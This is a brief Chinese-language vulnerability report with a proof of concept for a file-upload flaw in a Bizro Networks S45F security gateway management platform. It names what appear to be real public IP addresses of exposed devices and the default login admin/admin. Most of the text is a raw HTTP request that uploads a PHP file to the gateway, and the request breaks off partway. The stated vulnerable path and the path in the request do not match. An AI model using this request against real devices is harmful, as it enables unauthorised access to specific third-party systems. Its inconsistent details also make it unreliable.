漏洞关键信息 漏洞描述 厂商: 北京贝桔网络科技有限公司 (Baizhuo Network) 产品: Bizro Networks Smart S45F 多服务安全网关智能管理平台 漏洞类型: 文件上传漏洞 目标信息 官网: https://www.bizoro.com/ 版本: S45 漏洞路径: /sysmanage/changelogo.php IP: https://103.121.164.62:8443/ 账号密码: admin/admin POC (Proof of Concept) ```http POST /sysmanage/updatelib.php? HTTP/1.1 Host: 222.180.2.66:8443 Cookie: PHPSESSID=c36d5527fd784aa29748b3b3c50be7bc User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------42328904123665875270630079328 Content-Length: 715 Origin: https://222.180.2.66:8443 Referer: https://222.180.2.66:8443/sysmanage/licence.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close ----------------------------42328904123665875270630079328 Content-Disposition: form-data; name="ck" radhttp ----------------------------42328904123665875270630079328 Content-Disposition: form-data; name="file_upload"; filename="phpinfo.php" Content-Type: application/octet-stream ----------------------------42328904123665875270630079328 Content-Disposition: form-data; name="hid_ftp_ip"